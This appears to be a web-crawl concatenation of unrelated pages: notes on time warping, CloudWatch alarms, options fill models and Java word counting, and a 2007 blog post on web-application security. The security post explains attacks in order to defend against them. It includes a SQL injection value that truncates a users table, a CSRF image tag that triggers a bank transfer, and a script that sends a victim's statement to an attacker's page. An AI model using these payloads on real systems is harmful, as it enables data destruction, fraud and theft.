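data = os.read(fd, 100)
os.close(fd)
print(data)  # b'hello\n'
```

Note that the two-argument form omits mode, which is only consulted when O_CREAT is given.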
http://wiki.wlug.org.nz/open(2)
This blog is part 1 of our two-part series Using Dynamic Time Warping and MLflow to Detect Sales Trends. To read part 2, see the second post in the series.

Dynamic Time Warping

The objective of time series comparison methods is to produce a distance metric between two input time series. The similarity or dissimilarity of two time series is typically calculated by converting the data into vectors and calculating the Euclidean distance between those points in vector space.

Dynamic time warping is a seminal time series comparison technique that has been used for speech and word recognition since the 1970s, with sound waves as the source; an often-cited paper is Dynamic time warping for isolated word recognition based on ordered graph searching techniques.

Background

This technique can be used not only for pattern matching, but also for anomaly detection (e.g., overlapping time series between two disjoint time periods to understand if the shape has changed significantly, or to examine outliers). For example, when looking at the red and blue lines in the following graph, note that traditional time series matching (i.e., Euclidean matching) is extremely restrictive. On the other hand, dynamic time warping allows the two curves to match up evenly even though the X-axes (i.e., time) are not necessarily in sync. Another way to think of this is as a robust dissimilarity score, where a lower number means the series is more similar.

Source: Wiki Commons: File:Euclidean_vs_DTW.jpg

Two time series (the base time series and the new time series) are considered similar when it is possible to map one onto the other with a function f(x), according to warping rules, so as to match the magnitudes using an optimal (warping) path.

Sound pattern matching

Traditionally, dynamic time warping is applied to audio clips to determine the similarity of those clips. For our example, we will use four different audio clips based on two different quotes from a TV show called The Expanse.
There are four audio clips (you can listen to them below, but this is not necessary) - three of them (clips 1, 2, and 4) are based on the quote "Doors and corners, kid. That's where they get you." and one clip (clip 3) is the quote "You walk into a room too fast, the room eats you." Quotes are from The Expanse.

Below are visualizations, using matplotlib, of the four audio clips:

- Clip 1: This is our base time series, based on the quote "Doors and corners, kid. That's where they get you."
- Clip 2: This is a new time series [v2] based on clip 1, where the intonation and speech pattern are extremely exaggerated.
- Clip 3: This is another time series, based on the quote "You walk into a room too fast, the room eats you.", with the same intonation and speed as clip 1.
- Clip 4: This is a new time series [v3] based on clip 1, where the intonation and speech pattern are similar to clip 1.

The code to read these audio clips and visualize them using matplotlib can be summarized in the following code snippet:

from scipy.io import wavfile
from matplotlib import pyplot as plt
from matplotlib.pyplot import figure

# Read stored audio files for comparison
fs, data = wavfile.read("/dbfs/folder/clip1.wav")

# Set plot style
plt.style.use('seaborn-whitegrid')

# Create subplots
ax = plt.subplot(2, 2, 1)
ax.plot(data1, color='#67A0DA')
...

# Display created figure
fig = plt.show()
display(fig)

The full code base can be found in the notebook Dynamic Time Warping Background.

As the graphs show, the two clips (in this case, clips 1 and 4) have different intonations (amplitude) and latencies for the same quote. If we were to follow a traditional Euclidean matching (per the following graph), even if we were to discount the amplitudes, the timings between the original clip (blue) and the new clip (yellow) do not match. With dynamic time warping, we can shift time to allow for a time series comparison between these two clips.
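Before reaching for a library, it helps to see the warping idea itself. The classic dynamic-programming recurrence can be sketched in a few lines of plain Python (a naive O(n*m) version, not the faster approximation that fastdtw implements):

```python
def dtw_distance(a, b):
    """Naive dynamic time warping distance between two 1-D sequences."""
    n, m = len(a), len(b)
    INF = float("inf")
    # D[i][j] = DTW distance between the prefixes a[:i] and b[:j]
    D = [[INF] * (m + 1) for _ in range(n + 1)]
    D[0][0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = abs(a[i - 1] - b[j - 1])
            # each step along the warping path may match, stretch, or compress time
            D[i][j] = cost + min(D[i - 1][j], D[i][j - 1], D[i - 1][j - 1])
    return D[n][m]

print(dtw_distance([0, 1, 2, 1, 0], [0, 1, 2, 1, 0]))  # 0.0
print(dtw_distance([0, 0, 1, 2, 1], [0, 1, 2, 1, 1]))
```

Identical series score 0, and series that differ mainly by a small time shift tend to stay close, which is exactly the flexibility that point-by-point Euclidean matching lacks.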
For our time series comparison, we will use the fastdtw PyPI package; the instructions to install PyPI packages within your Databricks workspace can be found here: Azure | AWS. By using fastdtw, we can quickly calculate the distance between the different time series.

from fastdtw import fastdtw

# Distance between clip 1 and clip 2
distance = fastdtw(data_clip1, data_clip2)[0]
print("The distance between the two clips is %s" % distance)

The full code base can be found in the notebook Dynamic Time Warping Background.

Some quick observations:

- As noted in the preceding graph, clips 1 and 4 have the shortest distance, as the audio clips have the same words and intonations.
- The distance between clips 1 and 3 is also quite short (though longer than when compared to clip 4): even though they have different words, they use the same intonation and speed.
- Clips 1 and 2 have the longest distance due to the extremely exaggerated intonation and speed, even though they use the same quote.

As you can see, with dynamic time warping, one can ascertain the similarity of two different time series. Now that we have discussed dynamic time warping, let's apply this use case to detect sales trends.
https://databricks.com/blog/2019/04/30/understanding-dynamic-time-warping.html
Prepare for Attack!—Making Your Web Applications More Secure

Jan 16th, 2007 by thesamet.

SQL Injection Attacks

The joy of using an ORM like SQLAlchemy or SQLObject—in addition to the benefit of not having to write a single SQL statement yourself—is its ability to protect you from SQL injection attacks. Although this built-in security measure affords you protection, it is important to understand how SQL injection attacks work.

If an application contains code that looks like this...

mysql.execute(
    "SELECT * FROM users WHERE user_id='%s'" % cherrypy.request.cookies['user_id'].value)

...then you are vulnerable to the stinging strikes of a malicious user. That's because he or she can craft a cookie with the value of "someonebad'; TRUNCATE TABLE users; SELECT '". The SQL statement that will be executed will then be:

SELECT * FROM users WHERE user_id='someonebad'; TRUNCATE TABLE users; SELECT ''

...which is not good, not good indeed!

To see just how bad the situation really is for our fellows in PHP land, have a look at these Google code search results, or for our little brothers in ASP land, have a look here. Please act responsibly and don't hack into the sites listed there.

Luckily, ORMs escape all the strings we send to the database engine, and as a result, we are protected from this kind of harmful attack.

XSRF: Cross-Site Request Forgery

This exploit is very common in Web applications, especially in those that provide an AJAX API. It is best to describe this type of attack with an example. Suppose that an imaginary project, TGBank (which is a Web interface for a bank), has a send_money() method:

def send_money(self, to_whom, how_much):
    # validate that user has enough money
    transfer_money(
        from_user=identity.current.user.user_id,
        to_user=to_whom,
        amount=float(how_much))
    turbogears.redirect('/')

The bank site using this application might contain a page with a "send money" form, where the user fills in information such as to whom he is transferring the money and how much money he is transferring.
Everything's fine and dandy there. But what if the user is connected to the bank site, and in another browser tab, he is simultaneously browsing a malicious site, one that contains the following img tag (the hostname being whatever the bank's domain is)?

<img src="https://tgbank.example/send_money?to_whom=thesamet&how_much=0.04" width="0">

Then the user's browser will trigger that operation on behalf of the unsuspecting and innocent Web visitor. And because it's such an inconsequential amount, he probably won't even bother to check about those four cents.

Allowing only POST requests to go into send_money() will not help the matter. That's because it is easy to send POST requests using Javascript. On the other hand, checking that the HTTP referrer header of the request is within one's domain is too restrictive. That's because many browsers often do not send this header.

A possible solution is to add a hidden field that only your application can generate and validate. For example, you might decide that the application will process the request only if it received a query argument with the value of a sha1 digest of a string that is composed of the user id and a secret word. This string can be easily validated by your application, but it will be hard for a malicious site to generate.

Utterly Ridiculous!—More XSRF: Stealing Information with Scriptaculous

In addition to doing serious damage, this type of attack can be used to steal information. Suppose the bank application previously mentioned has a URL that returns Javascript code that defines a list with your monthly statement (a list of expenses). It may be used on the bank site for doing client-side sorting.
A malicious site might contain something like this:

<script type="text/javascript">
function send_data_to_the_criminal() {
    /* code that converts the statement object to a string goes here */
    new Ajax.Request('/collect_other_people_data.php',
        { postBody: 'data=' + statement });
}
window.onload = send_data_to_the_criminal;
</script>

Here, that dastardly attacker placed code on his site that executes the monthly statement script from the bank's site. Once that script is executed, we have an object named statement containing a list of monthly expenses. Then, after the document has finished loading, it is transmitted right into the waiting attacker's hands.

Recently, an XSRF flaw was discovered (and fixed) in GMail. This vulnerability allowed an attacker to steal the user's contact list precisely as just mentioned.

Assault–Take Two! XSS: Cross-Site Scripting

A cross-site scripting vulnerability occurs when a Web application generates output that contains user-supplied data without HTML encoding. For example, if we allow a post in a forum to contain HTML tags, then we can use KID to display it:

<div>
    ${XML(forum_post.body)}
</div>

Raising the ax yet again, a vile attacker can embed Javascript code into his post. Then, when an innocent user visits the page, his or her browser runs the script, unbeknownst to him or her. This script can, for example, send the contents of the page back to the attacker. It might also post a comment to a blog in the unsuspecting user's name, or make new friends for him or her on MySpace.

If we do not use the XML() function in KID, then HTML entities are escaped and we are safe. The users will see just the script text and the browser will not interpret it as code. That said, if XML() is to be used, then it is suggested one check whether the string contains '<script' (case insensitive) before actually sending it. You should also beware of spaces between the script and its surrounding < and >, although I haven't tested which browsers allow it.
Note that most HTML elements allow attributes that can contain Javascript code, like onmouseover or onclick. The safest thing would be to escape all '<' characters to '&lt;' (Python has a cgi.escape function for this). If HTML tags are to be allowed, then the application should carefully check that they contain only permitted attributes. Also, the href attribute of the <a> tag should be checked so that it does not contain something like "javascript:do_something()". That way, those malicious attackers can be forced to drop their weapons before they have time to draw them.

Now that you've learned how to preempt attacks before they strike, you're well on your way to a more enjoyable Web application development experience. Comments and questions about the strategies outlined here are welcomed. We also encourage suggestions on how you've successfully waged war against security attackers.

Comments:

I had never understood how XSS actually worked. Thanks for the simple explanation!

In the end, you should never allow users to input HTML in your pages. If you really have to, search the input for allowed tags (like <b>, <i>, <em>, etc.), remove any unknown attributes in them, and replace '&', '<' and '>' in all other places with the escapes '&amp;', '&lt;' and '&gt;' respectively.

This sounds like a cool util function for TurboGears.

> Here, that dastardly attacker placed code on his site, that puts the monthly statement from the bank's site, inside a DIV. Then, once that data arrives, it is transmitted right into the waiting attacker's hands.

What on earth are you talking about? No browser will allow this sort of cross-site scripting. The GMail vulnerability was related to the fact that GMail was returning data as Javascript, and the script tag doesn't restrict loading of scripts from other hosts. Really, you should at least test your code before writing blog posts like this.

Hi Tom, Thanks for pointing out this inaccuracy. I've corrected the example.
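To make the escaping advice above concrete, here is a minimal sketch in Python. The post's cgi.escape is the Python 2-era spelling; html.escape is the modern standard-library equivalent, and the sanitize function name here is just illustrative:

```python
import html

def sanitize(text):
    # Escape &, <, > and quotes so the browser renders user input as text,
    # never as markup or script
    return html.escape(text)

print(sanitize('<script>alert("xss")</script>'))
# &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Escaping on output like this neutralizes both the <script> case and the attribute-injection cases (onclick, onmouseover) discussed above, since the quotes needed to break out of an attribute are escaped too.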
Well, you do realise that PHP also escapes all those $_GET and $_POST strings too? It is called Magic Quotes. This has been on by default since PHP 4 first came out, IIRC. Also, in PHP the mysql_query() function will only process a single SQL command. So even supposing you got your SQL injection into the applications listed in that Google search, only:

SELECT * FROM users WHERE user_id='someonebad';

would be sent to the MySQL server. The rest would be thrown away. PHP is reasonably secure on a default install (i.e., you have to go out of your way to be insecure).

Just a note: magic_quotes are off by default in PHP 5, I think. I use them too and I actually find them helpful, contrary to what other PHP programmers say.

Great article, but I have yet to see an online banking interface that sends sensitive data via JS. Of course, I only really know the ones that I'm using myself, and, in general, you're right about making sure it's secure.

Jamie: I thought Magic Quotes were considered bad? But you're right about the single query. Also, as a possible solution for this kind of attack, couldn't you just use a regexp to search for semicolons outside quotation marks in the SQL? Or, for that matter, just escaping quotation marks and escape characters should be fine already. I also wonder: you allow for links in comments on this site, but do you take out potential inline events such as onclick="whatever()", or the old href="javascript:whatever()"?

Hi Matthias, thanks for your comments! It makes sense that the bank will send the data in javascript and the client can plot a graph using this data (with FusionCharts perhaps). Even if it is done over https, the malicious site can use https as well and the user will not be warned. This site runs a standard installation of WordPress. AFAIK, it removes such things from the comments.
(But I can still add malicious code to the posts :)

I think Magic Quotes was a good effort to prevent beginner programmers from making the mistake of not escaping input that would end up in a database query. Now, it can be annoying when you end up with slashes all over your incoming data, I agree. But I would rather it was escaping input by default, and it took effort to turn it off (only a couple of lines of PHP), rather than leaving input unescaped and making it an effort to escape later (which we know many beginners do not do). Personally, I detect Magic Quotes at runtime, and if it is on, I reverse its escaping mechanism, as I have a more elegant solution for my application. But I still see the value of giving beginners at least some basic protection against SQL injections. Now, in PHP 6 Magic Quotes will be removed. This is because people should by then (beginners included) be using prepared statements, whereby individual input parameters are escaped as they are passed into an SQL query, so Magic Quotes becomes unnecessary. So I disagree that Magic Quotes are a bad thing.

That's not enough. What about onload, onmouseover, … and href="javascript:…"?

Thanks for pointing this out, Marc! I've updated the post.

This is one of the better articles on online security. Beats those countless SQL injection articles that are clearly geared towards newcomers.
Nice article. However, your blog post is titled "Prepare for Attack!—Making Your Web Applications More Secure". I don't see your suggestions of how to prevent those attacks. Frank

Hi Frank, Thanks for your comment. Prevention of SQL injection and XSS attacks is straightforward: never assume that data coming from the web is safe, even if you think no one will discover a URL which is hidden somehow in your javascript code. User input such as comments or posts should be stripped of all '<' symbols, and if it is used in SQL statements, then it is best to use an SQL string escaping function like mysql_escape_string in PHP. XSRF attacks can be avoided by not giving out sensitive data or allowing any action without making sure the user actually requested it. A prevention technique is described in the article.
http://www.thesamet.com/blog/2007/01/16/prepare-for-attack%e2%80%94making-your-web-applications-more-secure/
I am trying to do some options backtesting. I am finding that the MarketOrder fills for the options are very erratic. Most likely it comes down to the low-volume trading that occurs on the options. Anyway, something I usually do is assume I lose the spread on every trade execution. For example, when selling an option, you always assume you sell at the bid, and when buying, you always assume you buy at the ask. At QuantConnect we have bid/ask data, so that seems possible, although I can't quite figure out how I would do the code. From the docs we have this simple example:

# Set the fill models in initialize:
self.Securities["IBM"].SetFillModel(PartialFillModel())

# Custom fill model implementation stub
class PartialFillModel(ImmediateFillModel):
    def MarketFill(self, asset, order):
        # Override order event handler and return partial order fills
        pass

So how would I create a default fill model for all options that says MarketOrders are filled in the way I described above (selling at bids and buying at asks)? The documentation doesn't really explain what we need to return from this function. Would something like this work?

# Custom fill model implementation stub
class MyCustomFillModel(ImmediateFillModel):
    def MarketFill(self, asset, order):
        if order.isSell:
            order.fillPrice = asset.BidPrice
        else:
            order.fillPrice = asset.AskPrice
        return order

I know that the attributes of the order object are wrong, but I can't find any documentation explaining the order object and which attributes we are supposed to override in the fill model. Please help. Thanks.
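Setting the LEAN specifics aside, the pricing rule being asked about is simple enough to state on its own. This is an illustrative sketch only; the function name and string directions are made up and are not part of LEAN's API:

```python
def conservative_fill_price(direction, bid, ask):
    """Always 'lose the spread': sells fill at the bid, buys fill at the ask."""
    return bid if direction == "sell" else ask

# Selling an option quoted 1.20 / 1.40 fills at 1.20; buying fills at 1.40
print(conservative_fill_price("sell", 1.20, 1.40))  # 1.2
print(conservative_fill_price("buy", 1.20, 1.40))   # 1.4
```

A custom fill model would apply this rule inside its market-fill override, using the security's current bid/ask quote at fill time.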
https://www.quantconnect.com/forum/discussion/2990/setting-custom-market-order-fill-model-for-options/
AWS Cloud Operations & Migrations Blog

"Incidents" are both known and unknown events that disrupt your applications' performance and resiliency, and can negatively impact your business. With Amazon CloudWatch, you can monitor your application workloads, create alarms, set thresholds for alarms, and even create self-mitigating responses or send notifications in near-real time to your operations team. In this post, we discuss alarms, incident management, and remediation in detail.

What is an incident and why is it important?

According to the Information Technology Infrastructure Library (ITIL), an incident is "an unplanned interruption to an IT service or reduction in the quality of an IT service." Many of us have experienced such issues: the pager goes off in the early morning hours, confusion ensues about whether the incident is negatively impacting your customers, and management demands answers from those trying to piece together the evidence trail to identify the root cause and bring the service back to a stable operating state. Such incidents aren't fun for anyone.

It's important to understand what kinds of issues cause these incidents. When you understand the root cause, you can monitor, alert, and mitigate quickly to minimize the duration of the disruption. Here is a small list of examples:

- Code deployments – In the cloud, this process is now two-fold. A deployment gone wrong could potentially affect either the infrastructure or the software running on the infrastructure. With IaC, someone might set up the autoscaling group of a service with a maximum that's too low, causing the system to stall when load goes above normal because it can't scale to take the increased traffic. With a software deployment, you could be deploying new code that can't process a particular data attribute or type because your testing framework didn't account for it, so the application throws an exception and doesn't process the data as expected.
- Software issues in running workloads – These software-related issues aren't caused by a recent deployment but by something else, such as a memory leak or a software bug triggered by an unknown condition. Ideally these are caught in testing, but they do happen.

- Infrastructure issues – Infrastructure outages can occur due to manual configuration errors, such as modifications to network settings, or hardware failures.

CloudWatch provides monitoring for AWS resources with metrics like Amazon Elastic Compute Cloud (Amazon EC2) instance CPU, network I/O, and more. These baseline metrics are often enough to help get your application workloads enterprise-ready, but you can add more metric collections if needed, such as application-specific metrics. You can configure Amazon EC2 Auto Scaling to use CPU metrics to determine when the autoscaler needs to scale out the number of instances to meet the workload's requirements. You can also use it to scale in when CPU utilization drops. However, what if you wanted to use a different metric, such as the number of connections or queue depth, which are not included in CloudWatch by default? CloudWatch allows you to push custom metrics specific to your application workload's needs. For more information, see How to better monitor your custom application metrics using Amazon CloudWatch Agent.

Creating alarms and setting thresholds

When you're collecting the metrics you need from your application workload in CloudWatch, you need to determine what you want to alarm on. When to alarm is an important decision: you are effectively saying, "The system has hit a problem that someone should know about." If you alarm too much and too often, alarms tend to get ignored – the exact opposite of what you want. If one important alarm is lost in a sea of less-critical alarms, a service disruption could go on longer than required and have a negative impact on your business. When you create an alarm, you first select a metric.
Keep three key concepts in mind:

- The threshold for the alarm – For instance, setting an Amazon EC2 Auto Scaling event to scale out when CPU utilization exceeds 90% may be too high, because you may not be able to get new resources started in time before the CPU saturates at 100%. On the other hand, setting the scale-out event at 50% CPU utilization may be too low, causing more resources to be added when the CPU would have only increased to 65%, which the workload would have handled without needing a scale-out event.

- The statistic you're measuring – This statistic defines whether you're looking at the metric in question as an average value, a summed value, a maximum value, a minimum value, a P90 value, or a sample count. Looking at the metric value with different types of statistical variance gives you more flexibility in setting alarms. For instance, percentiles are very powerful in making good approximations and can provide insights into the consistency of your application's response time compared to that of an average.

- The period, threshold, and data points to alarm – Understanding how these features work together helps make sure that you don't over-alarm, and that the system has a chance to self-heal before an alarm is triggered.

In the following use case, I have an application that uses an Amazon Simple Queue Service (Amazon SQS) queue, and I want to alarm when the total number of visible messages (ready-to-be-processed messages) exceeds 1 million. From both testing and early production data, we know that the queue usually has no more than 100,000 messages.

- On the CloudWatch console, choose Create alarm.
- Choose the SQS metric namespace.
- For Metric name, enter ApproximateNumberOfMessagesVisible.
- For QueueName, enter a name.
- For Statistic, choose Average (Max may also be appropriate).
- For Period, choose 5 minutes.
- For Threshold type, select Static.
- Select Greater.
- For Define the threshold value, enter 1000000.
- Under Additional configuration, set Datapoints to alarm to 3 out of 3.

The Datapoints to alarm configuration allows you to create a soft vs. hard state before the alarm is triggered and action is taken. For this use case, if the queue is greater than 1 million messages in the first 5-minute period, the alarm sees it but doesn't act. If in the next 5-minute period it's still over 1 million messages, it sees it but still doesn't act. If in the third 5-minute period the messages still number more than 1 million, the alarm changes from a soft to a hard alarm state because it saw the alarm criteria met three consecutive times. In essence, this means that the issue must persist for three consecutive periods, or 15 minutes. Thinking of this another way, if in the first 5-minute period there were over 1 million messages in the queue and it alarmed, but in the next 5-minute period the consumers of the messages had already processed a third of the queue, the alarm would have been sent out prematurely, and the operations person who woke up at 3:00 AM to check the queue would see that the problem had resolved itself, and would be less interested in responding to any future 3:00 AM queue depth pages.

The following graph illustrates the threshold changing over time.

That doesn't mean, however, that all alarms require action. Sometimes, you may just want to send a notification for informational purposes; other times you may want to send a notification that requires manual intervention. These are some of the criteria that distinguish a critical alarm from an informational one. In our use case, if our queue reaches a depth of 1 million messages, I want a notification to be sent to the operations email distribution list. This is strictly informational, to make us aware that at times we are greatly over our normal message counts.
Informational notifications can provide clues on new trends and changes, such as the growing popularity of your product in another part of the world, and help you reset the threshold before an outage actually occurs.
With CloudWatch, you can also combine alarms into a single composite alarm. This allows you to monitor the health of a larger ecosystem such as a web application, a large-scale workload, a Region, or even Availability Zones, while reducing the number of alarms associated with the resources that make up the ecosystem. For more information, see Improve monitoring efficiency using Amazon CloudWatch Composite Alarms.
Another way to monitor metrics, one that detects changes from normal behavior and learns as it goes, is to incorporate machine learning into your monitoring, as CloudWatch introduced earlier this year with Anomaly Detection. For more information, see How to set up CloudWatch Anomaly Detection to set dynamic alarms, automate actions, and drive online sales.
Types of actions to take based on alarm state
It's important not only to trigger alarms for the right reasons, but also to take the right actions based on them. Each alarm you configure triggers once per the criteria you set. In our queue use case, it triggers after three consecutive alarm periods, and then triggers again when another three consecutive occurrences are captured. What can you do with these alarms? What is the right action to take?
Notifications are a good place to start. When an alarm enters the alarm state, you can set it to send a notification to an Amazon Simple Notification Service (Amazon SNS) topic. This allows you to create subscriptions based on the topic. For this use case, I trigger an alarm and send an informational email any time the message queue has over 1 million visible messages. The following screenshot shows the configuration of this notification.
In the following screenshot, you can see that we have chosen the "In alarm" option and selected the "Select an existing SNS topic" option to send notifications to the SNS topic on the account.
The OpsTeamInfoAlarm@example.com address receives the email, but no one is paged. How do I page when there is a critical alarm? In this use case, I'm monitoring the APIs of my microservices and I find that one of my microservice or health-check API endpoints has been down two consecutive times over 10 minutes, which matches the alarm state of the CloudWatch alarm for that service. Someone needs to be alerted to investigate and hopefully restore the microservice to health. You can send text messages to the on-call team or integrate with a tool like PagerDuty to page them.
SMS text notifications
To send a text message, create an SNS topic. Then create a subscription and for Protocol, choose SMS and enter the phone number to text. Make sure SMS is available in your Region, and be aware that you may need to request an increase in SMS limits.
PagerDuty integration
To integrate with PagerDuty, you must be signed up as a PagerDuty customer. PagerDuty has released custom integrations with CloudWatch for both SNS topics and CloudWatch Events. If you follow the PagerDuty integration procedure, you can have your alarms sent to PagerDuty and on to the pagers of your on-call staff.
Slack channel notification
Many teams communicate in Slack channels because they're an excellent way to create and communicate in virtual conference rooms when people aren't sitting near each other or the gear that they are administering or operating. To post CloudWatch alarm data to a Slack channel:
- Configure the alarm to forward the details to an SNS topic (as for email or SMS text).
- In the AWS Management Console, navigate to AWS Chatbot.
- Choose Configure a chat client.
- For Chat client, choose Slack.
- Choose Configure client.
- In the top right corner of the next page, choose Sign in to another workspace, or choose the workspace you are already signed in to.
- Read the details on permissions and choose Allow.
- In the Configuration settings of the workspace, you can choose to publish logs to CloudWatch Logs. For this use case, I select Errors only.
- For Channel type, I select Public and enter the channel name announcements. You need to give the chatbot an AWS Identity and Access Management (IAM) role. You can use one that you already created, but you need to make sure that you modify it for AWS Chatbot to use.
- Configure the chatbot by choosing an SNS topic in the Region you chose.
- Choose Save.
The chatbot is now subscribed to the SNS topic, which your alarm is configured to send details to when triggered. Did it work? The following screenshot shows the alarm messaging the ops team Slack channel.
AWS Chatbot can only receive events from the SNS topic for supported AWS services. If you send a notification event from a non-supported AWS service to your SNS topic, it doesn't forward the published SNS message to your Slack channel. In the chatbot setup above, I chose to publish errors to CloudWatch Logs. The following screenshot shows a message in CloudWatch Logs intended for my Slack channel but published to SNS from an unsupported service. The error message reads "Event received is not supported" because I simply published a message directly to the SNS topic from the console. For more information about setting up AWS Chatbot with Slack, see Test notifications from AWS services to Amazon Chime or Slack chat rooms.
Automation with Auto Scaling
As discussed earlier, you can use your monitoring and metrics to drive auto scaling events, such as scaling Amazon EC2 resources out or in, as well as ECS containers.
- When configuring the CloudWatch alarm, in the Auto Scaling section, for Alarm state trigger, select In alarm.
- For Resource type, select EC2 Auto Scaling group or ECS Service.
- For Select a service, choose your service.
- For Take the following action… choose the action to take.
Automation with AWS Lambda
AWS Lambda is a great way to remediate incidents that occur based on your alarms. For instance, suppose you're monitoring a microservice API that sits behind an Application Load Balancer, and traffic can't reach the microservice, so requests time out. You could have an alarm send an SNS notification to a topic to which a Lambda function is subscribed, so that the function runs a describe-security-groups --group-names microserviceXYZ command to validate that the ports are still open for the load balancer. If not, it could issue a command to open them. The integration is very similar to the Slack integration, but instead of a message being posted in a Slack channel, it automatically fixes the issue. The following diagram illustrates this architecture. Here an alarm is configured to send a notification to SNS, which invokes a Lambda function that in turn makes changes to the security group in question.
Alarm prioritization
There are times when you may want the first occurrence of an alarm being triggered to be informational, the second to notify your operations teams to take action, and the third to escalate to senior leadership. CloudWatch doesn't dictate the prioritization of any alarms that you create, but these requirements can be met through your configuration of the alarms. The easiest way to achieve this is to create multiple alarms for the same metric, with different thresholds for each alarm. For instance, if you have a microservice that takes orders and processes them, you can create a custom metric in CloudWatch that reports on the service's latency each time it is called.
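Publishing such a custom latency metric is a single PutMetricData call. The following is a hedged sketch of building the datum; the namespace, metric name, and dimension values are assumptions, not from the original post:

```python
# Sketch: building a put_metric_data datum for a custom latency metric.
# Metric name, dimension, and namespace below are assumptions.
def latency_datum(service_name: str, latency_ms: float) -> dict:
    return {
        "MetricName": "Latency",
        "Dimensions": [{"Name": "Service", "Value": service_name}],
        "Unit": "Milliseconds",
        "Value": latency_ms,
    }

datum = latency_datum("process-orders", 212.0)
# In a real account you would call:
#   boto3.client("cloudwatch").put_metric_data(
#       Namespace="Custom/Microservices", MetricData=[datum])
```

Each of the prioritized alarms described next would then watch this one metric with its own threshold and evaluation periods.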
For the lowest-priority alarm (notification to email or the operations Slack channel), you create an alarm that looks at the average latency every 5 minutes and alarms if the latency is greater than 300 milliseconds for two consecutive periods (10 minutes). For the medium level of priority (page the on-call of the operations team), you create an alarm that watches the same latency metric but looks for a threshold greater than 500 milliseconds for three consecutive periods (15 minutes). Finally, the escalation email to senior leadership might be an alarm watching the same metric with a threshold greater than 1 second of latency for three consecutive periods (15 minutes). Each alarm is watching the same metric but looking for different thresholds over different consecutive periods.
If all three alarms trigger during a hypothetical outage of the process-orders microservice, the first alert sequence might look like the following timeline, which shows all the alarms being triggered sequentially. However, because each alarm has its own threshold on the same metric, you will continue to receive lower-priority alerts during an outage even after the medium or higher alerts are triggered, because the threshold for the lower alarm is still being met (a medium alert of 500 milliseconds for 15 minutes also exceeds the lower threshold of 300 milliseconds for 10 minutes).
In this graphic, however, you can see that if the rising latency isn't mitigated when the lowest-priority alarm is triggered, the medium-priority alarm is triggered. Again, if the service disruption isn't mitigated by the actions taken by the medium-priority alarm and latency continues to rise, the high-priority alarm is triggered with notifications and a call to action from senior leadership.
Summary
As you begin workload migration to the cloud, monitoring and operational excellence can be a key factor in determining your workload's success.
You can use CloudWatch to create custom metrics and alarms on metrics to help illustrate things like access patterns, performance patterns, scale-out and scale-in thresholds, and response to incidents. CloudWatch offers integrations to keep your DevOps teams informed via email, SMS text messages, and the collaborative tools they are accustomed to, such as Slack or Amazon Chime. You can set alarms at different levels to allow different actions based on different levels of alerting priority (e.g., informative only, automated remediation, and executive notification).
About the Author
Eric Scholz is a Principal Solutions Architect at Amazon Web Services. He enjoys helping customers build solutions to overcome technical challenges. In his off time, you can usually find Eric doing outdoor activities with his family while dabbling in personal projects like building cars and 3D printing.
https://aws.amazon.com/blogs/mt/alarms-incident-management-and-remediation-in-the-cloud-with-amazon-cloudwatch/
How to count the number of words in a string in Java
This tutorial covers two ways to count the number of words in a string in Java:
- Using the StringTokenizer class.
- Using the command line itself.
StringTokenizer Class
What is this StringTokenizer class? StringTokenizer is a class whose object tokenizes a given String. The StringTokenizer class has three constructors, which take up to three parameters:
- String: the string which is to be tokenized.
- delim: the delimiters (such as space, tab, etc.) used to tokenize the given String.
- flag: if the flag is false, delimiters are used only to separate the tokens; if the flag is true, the delimiters are themselves returned as tokens.
In the code given down below, a WordsInAString class has a single String, which is passed to its constructor. The class has one stringLength( ) method which calculates the number of words in the String. At first, we create a StringTokenizer object. A variable identified as length holds the number of words in the String. The countTokens( ) method is a method of the StringTokenizer class which counts the number of tokens in the String, taking into account the delimiters used. In this code, no delim parameter is passed to the StringTokenizer constructor, so the default delimiters (space, tab, and so on) are used. The length is then printed.
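Before the full program, the behavior of countTokens( ) can be sketched in isolation. CountTokensDemo is a made-up helper class for illustration, not part of the tutorial's code:

```java
import java.util.StringTokenizer;

public class CountTokensDemo {
    // Counts words using StringTokenizer's default delimiters
    // (space, tab, newline, carriage return, form feed).
    static int wordCount(String s) {
        if (s == null || s.isEmpty()) {
            return 0;
        }
        return new StringTokenizer(s).countTokens();
    }

    public static void main(String[] args) {
        System.out.println(wordCount("Welcome to codespeedy"));      // prints 3
        System.out.println(wordCount("  extra   spaces   here  "));  // prints 3
    }
}
```

Note that runs of consecutive delimiters are collapsed, so leading, trailing, or repeated spaces do not inflate the count.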
The code for the problem is as follows:
Count the number of words in a string in Java

import java.util.Scanner;
import java.util.StringTokenizer;

public class WordsInAString {
    String str;

    public WordsInAString(String str) {
        this.str = str;
    }

    public void stringLength() {
        // check for null before calling isEmpty() to avoid a NullPointerException
        if (str == null || str.isEmpty()) {
            System.out.println("There are no words in the sentence.\n");
        } else {
            // StringTokenizer class object is created
            StringTokenizer words = new StringTokenizer(str);
            // countTokens() method counts the number of words
            int length = words.countTokens();
            // print the length
            System.out.println("There are " + length + " words in the sentence.");
        }
    }
}

class Test {
    public static void main(String args[]) {
        Scanner s = new Scanner(System.in);
        System.out.println("\nEnter a String.");
        String input = s.nextLine();
        WordsInAString w = new WordsInAString(input);
        w.stringLength();
    }
}

A single line of input is given which contains the String. The output is the number of words in the String.
Output
Enter a String.
Welcome to codespeedy
There are 3 words in the sentence.
Using Command-Line Input: Count the number of words in a string
The command-line technique is a rather simple technique for calculating the number of words in the sentence. It uses the String arguments passed to the main method. For example: if the input string is Welcome to codespeedy, args[0] gets assigned Welcome, args[1] gets assigned to, and args[2] gets assigned codespeedy. Hence args.length (a field, not a method) gives the number of words in the String.
Code

public class WordsInAString {
    public static void main(String[] args) {
        System.out.println("The sentence has " + args.length + " words");
    }
}

Output
After compilation of the .java file on the command line, the .class file is created. Now when executing this class file, the general syntax followed is java <classname>.
The String input is given at the time of executing this class file itself, as java <classname> Welcome to codespeedy. Hence, the output will be:
The sentence has 3 words
So that's all in this tutorial. All the best!
Also Read: An Object Oriented Approach of using Math.addExact( ) method in Java
https://www.codespeedy.com/how-to-count-the-number-of-words-in-a-string-in-java/
Introduction To SharePoint Interview Questions And Answers
